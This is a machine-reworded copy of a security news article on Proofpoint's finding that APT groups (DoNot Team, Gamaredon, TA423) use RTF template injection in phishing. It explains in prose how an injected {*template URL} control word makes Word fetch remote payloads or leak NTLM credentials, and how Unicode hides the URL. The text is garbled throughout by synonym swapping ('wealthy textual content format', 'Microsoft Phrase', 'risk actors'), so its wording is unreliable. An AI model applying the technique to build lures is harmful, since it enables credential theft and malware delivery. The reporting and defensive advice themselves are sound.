[ad_1]
Three APT hacking teams from India, Russia, and China, have been noticed utilizing a novel RTF (wealthy textual content format) template injection method of their current phishing campaigns.
This method is a straightforward but efficient methodology to retrieve malicious content material from a distant URL, and risk analysts anticipate it to achieve a wider viewers of risk actors quickly.
Researchers at Proofpoint noticed the primary circumstances of weaponized RTF template injection in March 2021, and since then, actors have been steadily optimizing the method.
A easy methodology to fetch payloads
Wealthy Textual content Format (RTF) recordsdata are a doc format created by Microsoft that may be opened utilizing Microsoft Phrase, WordPad, and different functions discovered on nearly all working techniques.
When creating RTF recordsdata, you’ll be able to embrace an RTF Template that specifies how the textual content within the doc ought to be formatted. These templates are native recordsdata imported into an RTF viewer earlier than displaying the contents of the file to format it appropriately.
Whereas RTF Templates are supposed to be hosted domestically, risk actors at the moment are abusing this legit performance to retrieve a URL useful resource as an alternative of an area file useful resource.
This substitution permits risk actors to load malicious payloads into an utility like Microsoft Phrase or carry out NTLM authentication towards a distant URL to steal Home windows credentials. Moreover, as these recordsdata are transferred as RTF Templates, they’re extra apt to bypass the detection phishing lures as they aren’t initially current within the RTF recordsdata.
Creating distant RTF Templates could be very easy as all a risk actor has to do is add the {*template URL} command into an RTF file utilizing a hex editor, as proven beneath.
A URL-hiding instance created by Proofpoint’s researchersSource: Proofpoint
The tactic can also be viable on doc.rtf recordsdata opened in Microsoft Phrase, forcing the app to retrieve the useful resource from the required URL earlier than serving the content material to the sufferer, as proven beneath.
Microsoft Phrase retrieving the exterior resourceSource: Proofpoint
Instances of abuse within the wild
Proofpoint has noticed this payload retrieval methodology on phishing campaigns by the pro-Indian hacking group DoNot Crew, the Russia-linked Gamaredon hacking group, and the TA423 risk actors.
A timeline of the noticed actions is proven beneath.
Timeline of actions related to RTF template injectionSource: Proofpoint
RTF recordsdata can parse 16-bit Unicode characters, so risk actors have been utilizing Unicode as an alternative of plaintext strings for the injected URL useful resource to evade detection.
Utilizing Unicode to cover the URL resourceSource: Proofpoint
Nonetheless, in some samples retrieved by the DoNot Crew campaigns, Proofpoint observed a failure to cross Microsoft Phrase’s checks, leading to an error message in regards to the distant supply being invalid.
Since these errors are generated earlier than the decoy content material is served to the goal, the possibilities of success for DoNot’s phishing makes an attempt drop considerably.
TA423, however, did not obfuscate the injected URLs, exchanging increased danger for detection and evaluation for error-free loading on Microsoft Phrase.
TA423 lure utilizing RTF Template injectionSource: Proofpoint
Lastly, within the case of Gamaredon, the researchers sampled RTF paperwork that impersonated Ukrainian authorities organizations to ship an MP3 file as a distant useful resource.
MP3 file fetched as an exterior resourceSource: Proofpoint
As RTF Template injections are simply achieved utilizing a hex enhancing software and will not be as closely detected by antivirus scanners, they stand to develop into extra broadly utilized by risk actors.
“The viability of XML Workplace based mostly distant template paperwork has confirmed that this kind of supply mechanism is a sturdy and efficient methodology when paired with phishing as an preliminary supply vector,” defined Proofpoint of their report.
“Whereas this methodology at the moment is utilized by a restricted variety of APT actors with a spread of sophistication, the method’s effectiveness mixed with its ease of use is prone to drive its adoption additional throughout the risk panorama.”
Moreover, because the malicious content material is retrieved from a distant URL, it permits the risk actors to dynamically modify their campaigns in real-time to make use of new payloads or totally different malicious behaviors.
To defend towards this risk, you ought to keep away from downloading and opening RTF recordsdata arriving through unsolicited emails, scan them with an AV scanner, and preserve your Microsoft Workplace updated by making use of the newest out there safety updates.
Proofpoint additionally shared YARA signatures that admins can use to detect RTF recordsdata modified to incorporate distant RTF Templates.
[ad_2]